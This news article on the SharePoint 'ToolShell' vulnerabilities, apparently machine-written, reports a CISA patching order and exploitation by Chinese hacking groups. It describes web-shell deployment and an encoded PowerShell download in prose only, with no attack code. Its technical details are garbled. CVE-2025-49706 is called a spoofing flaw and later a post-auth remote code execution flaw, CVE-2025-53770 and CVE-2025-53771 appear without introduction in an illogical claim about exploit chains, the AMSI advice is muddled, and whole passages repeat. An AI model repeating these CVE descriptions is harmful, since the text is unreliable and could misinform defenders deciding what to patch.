Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

CISA Orders Urgent Patching for SharePoint Vulnerability After Chinese Hackers Exploit Flaws




The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert, urging federal civilian executive branch agencies to remediate two critical vulnerabilities in Microsoft SharePoint that have been actively exploited by Chinese hackers. The alert comes after evidence of exploitation was added to the CISA's Known Exploited Vulnerabilities (KEV) catalog on July 22, 2025. The two vulnerabilities, CVE-2025-49704 and CVE-2025-49706, are a spoofing vulnerability and a remote code execution vulnerability collectively tracked as ToolShell. Experts warn that enabling Antimalware Scan Interface (AMSI) instead of patching is a bad idea, as it would allow attackers to bypass this mitigation step.

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert about two critical vulnerabilities in Microsoft SharePoint.
  • The two vulnerabilities, CVE-2025-49704 and CVE-2025-49706, are a spoofing vulnerability and a remote code execution vulnerability that have been actively exploited by Chinese hackers.
  • Experts warn that enabling Antimalware Scan Interface (AMSI) instead of patching is a bad idea, as it would allow attackers to bypass this mitigation step.
  • The alert highlights the importance of prioritizing vulnerability remediation in federal agencies and serves as a reminder of the ongoing threat landscape.



    • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert, urging federal civilian executive branch agencies to remediate two critical vulnerabilities in Microsoft SharePoint that have been actively exploited by Chinese hackers. The alert comes after evidence of exploitation was added to the CISA's Known Exploited Vulnerabilities (KEV) catalog on July 22, 2025.

    The two vulnerabilities, CVE-2025-49704 and CVE-2025-49706, are a spoofing vulnerability and a remote code execution vulnerability collectively tracked as ToolShell. The inclusion of these flaws in the KEV catalog was prompted by Microsoft's revelation that Chinese hacking groups like Linen Typhoon and Violet Typhoon leveraged these vulnerabilities to breach on-premises SharePoint servers since July 7, 2025.

    According to CISA, the two vulnerabilities are related but distinct. CVE-2025-49704 is a SharePoint remote code execution vulnerability, while CVE-2025-49706 is a SharePoint post-auth remote code execution vulnerability. The fact that CVE-2025-53770 is both an authentication bypass and a remote code execution bug indicates that CVE-2025-53771 is not necessary to build the exploit chain.

    The attack chains observed so far entail the exploitation of SharePoint flaws to deploy a web shell that allows threat actors to retrieve and steal MachineKey data. Symantec has identified post-exploitation activity in which adversaries ran an encoded PowerShell command to download a file named "client.exe" from an external server and save it locally as "debug.js".

    Experts have warned that enabling Antimalware Scan Interface (AMSI) instead of patching is a bad idea, as it would allow attackers to bypass this mitigation step. The development comes as watchTowr Labs has internally devised a method exploiting CVE-2025-53770 such that it bypasses AMSI.

    The inclusion of these vulnerabilities in the KEV catalog and the subsequent alert from CISA underscore the importance of prioritizing vulnerability remediation in federal agencies. The fact that Chinese hackers have already exploited these vulnerabilities to breach on-premises SharePoint servers highlights the need for agencies to take immediate action to address these vulnerabilities.

    Microsoft has stated that it assists CISA with the Known Exploited Vulnerabilities Catalog, which provides regularly updated information on exploited vulnerabilities. However, experts argue that this does not excuse federal agencies from their responsibility to remediate identified vulnerabilities promptly.

    The CISA alert serves as a reminder of the ongoing threat landscape and the need for organizations to prioritize vulnerability remediation. As the threat actor landscape continues to evolve, it is essential for organizations to stay vigilant and take proactive steps to address emerging vulnerabilities.

    In conclusion, the inclusion of SharePoint vulnerabilities in the KEV catalog and the subsequent CISA alert underscore the importance of prioritizing vulnerability remediation in federal agencies. The fact that Chinese hackers have already exploited these vulnerabilities highlights the need for agencies to take immediate action to address these vulnerabilities.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/CISA-Orders-Urgent-Patching-for-SharePoint-Vulnerability-After-Chinese-Hackers-Exploit-Flaws-ehn.shtml

  • https://thehackernews.com/2025/07/cisa-orders-urgent-patching-after.html


    • Published: Wed Jul 23 07:29:08 2025 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us